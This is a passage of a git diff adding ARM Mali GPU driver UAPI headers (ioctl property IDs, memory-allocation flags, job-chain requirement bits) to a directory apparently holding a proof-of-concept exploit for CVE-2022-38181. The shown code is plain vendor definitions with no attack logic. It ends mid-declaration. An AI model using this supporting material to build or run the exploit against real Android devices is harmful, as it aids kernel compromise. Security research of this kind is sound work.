KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 + +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) + +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h new file mode 100644 index 0000000..b1cf438 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h @@ -0,0 +1,1216 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_JM_KERNEL_H_ +#define _UAPI_BASE_JM_KERNEL_H_ + +#include + +typedef __u32 base_mem_alloc_flags; +/* Memory allocation, access/hint flags. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/** + * Bit 19 is reserved. + * + * Do not remove, use the next unreserved bit for new flags + */ +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19) + +/** + * Memory starting from the end of the initial commit is aligned to 'extension' + * pages, where 'extension' must be a power of 2 and no more than + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK \ + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* Use the GPU VA chosen by the kernel client */ +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Force trimming of JIT allocations when creating a new allocation */ +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \ + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM) + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED \ + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19) + +#define BASEP_MEM_INVALID_HANDLE (0ull << 12) +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << 12) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \ + BASE_MEM_COOKIE_BASE) + +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the + * initial commit is aligned to 'extension' pages, where 'extension' must be a power + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0) + +/** + * If set, the heap info address points to a __u32 holding the used size in bytes; + * otherwise it points to a __u64 holding the lowest address of unused memory. + */ +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1) + +/** + * Valid set of just-in-time memory allocation flags + * + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set + * and heap_info_gpu_addr being 0 will be rejected). + */ +#define BASE_JIT_ALLOC_VALID_FLAGS \ + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE) + +/** + * typedef base_context_create_flags - Flags to pass to ::base_context_init. + * + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \ + ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \ + BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* + * Private flags used on the base context + * + * These start at bit 31, and run down to zero. + * + * They share the same space as base_context_create_flags, and so must + * not collide with them. + */ + +/* Private flag tracking whether job descriptor dumping is disabled */ +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \ + ((base_context_create_flags)(1 << 31)) + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED) +/* + * Dependency stuff, keep it private for now. May want to expose it if + * we decide to make the number of semaphores a configurable + * option. + */ +#define BASE_JD_ATOM_COUNT 256 + +/* Maximum number of concurrent render passes. + */ +#define BASE_JD_RP_COUNT (256) + +/* Set/reset values for a software event */ +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1) +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0) + +/** + * struct base_jd_udata - Per-job data + * + * This structure is used to store per-job data, and is completely unused + * by the Base driver. It can be used to store things such as callback + * function pointer, data to handle job completion. It is guaranteed to be + * untouched by the Base driver. + * + * @blob: per-job data array + */ +struct base_jd_udata { + __u64 blob[2]; +}; + +/** + * typedef base_jd_dep_type - Job dependency type. + * + * A flags field will be inserted into the atom structure to specify whether a + * dependency is a data or ordering dependency (by putting it before/after + * 'core_req' in the structure it should be possible to add without changing + * the structure size). + * When the flag is set for a particular dependency to signal that it is an + * ordering only dependency then errors will not be propagated. + */ +typedef __u8 base_jd_dep_type; + +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */ +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */ +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */ + +/** + * typedef base_jd_core_req - Job chain hardware requirements. + * + * A job chain must specify what GPU features it needs to allow the + * driver to schedule the job correctly. By not specifying the + * correct settings can/will cause an early job termination. Multiple + * values can be ORed together to specify multiple requirements. + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex + * dependencies, and that doesn't execute anything on the hardware. + */ +typedef __u32 base_jd_core_req; + +/* Requirements that come from the HW */ + +/* No requirement, dependency only + */ +#define BASE_JD_REQ_DEP ((base_jd_core_req)0) + +/* Requires fragment shaders + */ +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0) + +/* Requires compute shaders + * + * This covers any of the following GPU job types: + * - Vertex Shader Job + * - Geometry Shader Job + * - An actual Compute Shader Job + * + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the + * job is specifically just the "Compute Shader" job type, and not the "Vertex + * Shader" nor the "Geometry Shader" job type. + */ +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1) + +/* Requires tiling */ +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2) + +/* Requires cache flushes */ +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3) + +/* Requires value writeback */ +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4) + +/* SW-only requirements - the HW does not expose these as part of the job slot + * capabilities + */ + +/* Requires fragment job with AFBC encoding */ +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13) + +/* SW-only requirement: coalesce completion events. + * If this bit is set then completion of this atom will not cause an event to + * be sent to userspace, whether successful or not; completion events will be + * deferred until an atom completes which does not have this bit set. + * + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES. + */ +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5) + +/* SW Only requirement: the job chain requires a coherent core group. We don't + * mind which coherent core group is used. + */ +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6) + +/* SW Only requirement: The performance counters should be enabled only when + * they are needed, to reduce power consumption. + */ +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7) + +/* SW Only requirement: External resources are referenced by this atom. + * + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and + * BASE_JD_REQ_SOFT_EVENT_WAIT. + */ +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8) + +/* SW Only requirement: Software defined job. Jobs with this bit set will not be + * submitted to the hardware but will cause some action to happen within the + * driver + */ +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9) + +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1) +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2) +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3) + +/* 0x4 RESERVED for now */ + +/* SW only requirement: event wait/trigger job. + * + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set. + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the + * other waiting jobs. It completes immediately. + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it + * possible for other jobs to wait upon. It completes immediately. + */ +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5) +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6) +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7) + +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8) + +/* SW only requirement: Just In Time allocation + * + * This job requests a single or multiple just-in-time allocations through a + * list of base_jit_alloc_info structure which is passed via the jc element of + * the atom. The number of base_jit_alloc_info structures present in the + * list is passed via the nr_extres element of the atom + * + * It should be noted that the id entry in base_jit_alloc_info must not + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE. + * + * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE + * soft job to free the JIT allocation is still made. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9) + +/* SW only requirement: Just In Time free + * + * This job requests a single or multiple just-in-time allocations created by + * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time + * allocations is passed via the jc element of the atom. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa) + +/* SW only requirement: Map external resource + * + * This job requests external resource(s) are mapped once the dependencies + * of the job have been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb) + +/* SW only requirement: Unmap external resource + * + * This job requests external resource(s) are unmapped once the dependencies + * of the job has been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc) + +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders) + * + * This indicates that the Job Chain contains GPU jobs of the 'Compute + * Shaders' type. + * + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs. + */ +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10) + +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a + * particular core group + * + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag + * takes priority + * + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms. + * + * If the core availability policy is keeping the required core group turned + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code. + */ +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11) + +/* SW Flag: If this bit is set then the successful completion of this atom + * will not cause an event to be sent to userspace + */ +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12) + +/* SW Flag: If this bit is set then completion of this atom will not cause an + * event to be sent to userspace, whether successful or not. + */ +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14) + +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job starts which does not have this bit set or a job completes + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use + * if the CPU may have written to memory addressed by the job since the last job + * without this bit set was submitted. + */ +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15) + +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job completes which does not have this bit set or a job starts + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use + * if the CPU may read from or partially overwrite memory addressed by the job + * before the next job without this bit set completes. + */ +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16) + +/* Request the atom be executed on a specific job slot. + * + * When this flag is specified, it takes precedence over any existing job slot + * selection logic. + */ +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17) + +/* SW-only requirement: The atom is the start of a renderpass. + * + * If this bit is set then the job chain will be soft-stopped if it causes the + * GPU to write beyond the end of the physical pages backing the tiler heap, and + * committing more memory to the heap would exceed an internal threshold. It may + * be resumed after running one of the job chains attached to an atom with + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be + * resumed multiple times until it completes without memory usage exceeding the + * threshold. + * + * Usually used with BASE_JD_REQ_T. + */ +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18) + +/* SW-only requirement: The atom is the end of a renderpass. + * + * If this bit is set then the atom incorporates the CPU address of a + * base_jd_fragment object instead of the GPU address of a job chain. + * + * Which job chain is run depends upon whether the atom with the same renderpass + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or + * was soft-stopped when it exceeded an upper threshold for tiler heap memory + * usage. + * + * It also depends upon whether one of the job chains attached to the atom has + * already been run as part of the same renderpass (in which case it would have + * written unresolved multisampled and otherwise-discarded output to temporary + * buffers that need to be read back). The job chain for doing a forced read and + * forced write (from/to temporary buffers) is run as many times as necessary. + * + * Usually used with BASE_JD_REQ_FS. + */ +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19) + +/* SW-only requirement: The atom needs to run on a limited core mask affinity. + * + * If this bit is set then the kbase_context.limited_core_mask will be applied + * to the affinity. + */ +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20) + +/* These requirement bits are currently unused in base_jd_core_req + */ +#define BASEP_JD_REQ_RESERVED \ + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \ + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \ + BASE_JD_REQ_EVENT_COALESCE | \ + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \ + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \ + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \ + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \ + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK)) + +/* Mask of all bits in base_jd_core_req that control the type of the atom. + * + * This allows dependency only atoms to have flags set + */ +#define BASE_JD_REQ_ATOM_TYPE \ + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \ + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE) + +/** + * Mask of all bits in base_jd_core_req that control the type of a soft job. + */ +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f) + +/* Returns non-zero value if core requirements passed define a soft job or + * a dependency only job. + */ +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \ + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \ + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP) + +/** + * enum kbase_jd_atom_state + * + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used. + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD. + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running). + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet + * handed back to job dispatcher for + * dependency resolution. + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed + * back to userspace. + */ +enum kbase_jd_atom_state { + KBASE_JD_ATOM_STATE_UNUSED, + KBASE_JD_ATOM_STATE_QUEUED, + KBASE_JD_ATOM_STATE_IN_JS, + KBASE_JD_ATOM_STATE_HW_COMPLETED, + KBASE_JD_ATOM_STATE_COMPLETED +}; + +/** + * typedef base_atom_id - Type big enough to store an atom number in. + */ +typedef __u8 base_atom_id; + +/** + * struct base_dependency - + * + * @atom_id: An atom number + * @dependency_type: Dependency type + */ +struct base_dependency { + base_atom_id atom_id; + base_jd_dep_type dependency_type; +}; + +/** + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering. + * + * @norm_read_norm_write: Job chain for full rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not exceed + * its memory usage threshold and no fragment job chain + * was previously run for the same renderpass. + * It is used no more than once per renderpass. + * @norm_read_forced_write: Job chain for starting incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain exceeded + * its memory usage threshold for the first time and + * no fragment job chain was previously run for the + * same renderpass. + * Writes unresolved multisampled and normally- + * discarded output to temporary buffers that must be + * read back by a subsequent forced_read job chain + * before the renderpass is complete. + * It is used no more than once per renderpass. + * @forced_read_forced_write: Job chain for continuing incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain + * exceeded its memory usage threshold again + * and a fragment job chain was previously run for + * the same renderpass. + * Reads unresolved multisampled and + * normally-discarded output from temporary buffers + * written by a previous forced_write job chain and + * writes the same to temporary buffers again. + * It is used as many times as required until + * rendering completes. + * @forced_read_norm_write: Job chain for ending incremental rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not + * exceed its memory usage threshold this time and a + * fragment job chain was previously run for the same + * renderpass. + * Reads unresolved multisampled and normally-discarded + * output from temporary buffers written by a previous + * forced_write job chain in order to complete a + * renderpass. + * It is used no more than once per renderpass. + * + * This structure is referenced by the main atom structure if + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req. + */ +struct 